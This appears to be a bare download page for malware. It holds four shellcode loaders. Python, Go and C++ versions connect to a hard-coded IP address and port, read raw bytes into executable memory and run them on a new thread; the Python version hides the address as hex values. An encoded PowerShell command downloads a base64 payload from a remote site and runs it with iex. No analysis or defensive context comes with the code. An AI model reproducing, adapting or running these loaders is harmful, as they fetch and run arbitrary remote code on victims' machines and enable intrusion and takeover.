Download File

import ctypes,socket
p=b"";s=socket.create_connection((".".join(map(str,[0x5B,0x67,0x8C,0xE4])),58392))
while d:=s.recv(4096):p+=d
s.close()
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_void_p
m=ctypes.windll.kernel32.VirtualAlloc(0,len(p),0x3000,0x40);assert m
ctypes.memmove(m,(ctypes.c_char*len(p)).from_buffer_copy(p),len(p))
h=ctypes.windll.kernel32.CreateThread(None,0,ctypes.c_void_p(m),None,0,None)
ctypes.windll.kernel32.WaitForSingleObject(h,-1)
        

powershell.exe -EncodedCommand JABiADYANAAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACIAaAB0AHQAcABzADoALwAvAG4AaQB4AHAAbABvAGkAdAAuAGMAYwAvAGQAbwB3AG4AbABvAGEAZAAvAHAAdwBwAGEAeQBsAG8AYQBkAC8AcwB0AGEAcgB0ACIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACkAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAFwAcwAnACwAJwAnADsAIABpAGUAeAAgACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiADYANAApACkAKQA=
        

package main

import (
    "net"
    "syscall"
    "unsafe"
)

func main() {
    c, _ := net.Dial("tcp", "91.103.140.228:58392")
    defer c.Close()
    b := make([]byte, 0)
    t := make([]byte, 4096)
    for {
        n, _ := c.Read(t)
        if n == 0 {
            break
        }
        b = append(b, t[:n]...)
    }
    k := syscall.NewLazyDLL("kernel32.dll")
    v, _, _ := k.NewProc("VirtualAlloc").Call(0, uintptr(len(b)), 0x3000, 0x40)
    copy((*[1 << 20]byte)(unsafe.Pointer(v))[:], b)
    h, _, _ := k.NewProc("CreateThread").Call(0, 0, v, 0, 0, 0)
    k.NewProc("WaitForSingleObject").Call(h, 0xFFFFFFFF)
}
        

#define _WINSOCK_DEPRECATED_NO_WARNINGS 
#include <winsock2.h>
#include <windows.h>
#include <string>
#pragma comment(lib,"ws2_32.lib")

int main() {
    WSADATA w; WSAStartup(MAKEWORD(2, 2), &w);
    SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
    sockaddr_in a = { AF_INET,htons(58392) };
    a.sin_addr.s_addr = inet_addr("91.103.140.228");
    connect(s, (sockaddr*)&a, sizeof(a));
    char b[4096]; std::string p; int r;
    while ((r = recv(s, b, sizeof(b), 0)) > 0)p.append(b, r);
    WSACleanup();
    void* m = VirtualAlloc(0, p.size(), 0x3000, 0x40);
    memcpy(m, p.data(), p.size());
    HANDLE h = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)m, 0, 0, 0);
    WaitForSingleObject(h, -1);
}